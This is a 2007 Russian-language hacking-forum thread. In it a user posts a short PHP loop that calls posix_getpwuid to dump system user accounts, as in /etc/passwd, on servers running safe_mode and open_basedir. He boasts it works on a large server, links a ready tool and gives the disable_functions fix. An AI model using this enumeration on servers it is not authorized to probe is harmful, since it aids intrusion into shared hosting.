posix_getpwuid и /etc/passwd

Discussion in 'Безопасность и Анонимность' started by Muhacir, 14 May 2007.

  1. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    вот увидел функсию posix_getpwuid и подумав решил вот так

    Code:
        	                                for($uid=0;$uid<60000;$uid++){

                                        $ara = posix_getpwuid($uid); //тут читаем "/etc/passwd"

                                                if (!empty($ara)) {

                                                while (list ($key, $val) = each($ara)){

                                                print "$val:";
    и сработало выложил в php файл. залил на крупный сервант и пашеееет. в safe_mod=on & open_basedir.

    Tyt можно готовый взять: www.muhacir.info/tools/somsa.txt
    ++

    чтобы прикрыть баг нужно в php.ini disabled_funcitions добавить строку posix_getpwuid
     
    #1 Muhacir, 14 May 2007
    Last edited: 14 May 2007
    3 people like this.
  2. Linuxoid

    Linuxoid Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    200
    Likes Received:
    28
    Reputations:
    0
    А сервера с safe_mod=on разве еще официально в Красную книгу не занесли? ;)
    Ну а если сам до этого всетаки додумался, то однозначно молодец! ;)
     
    #2 Linuxoid, 14 May 2007
(You must log in or sign up to post here.)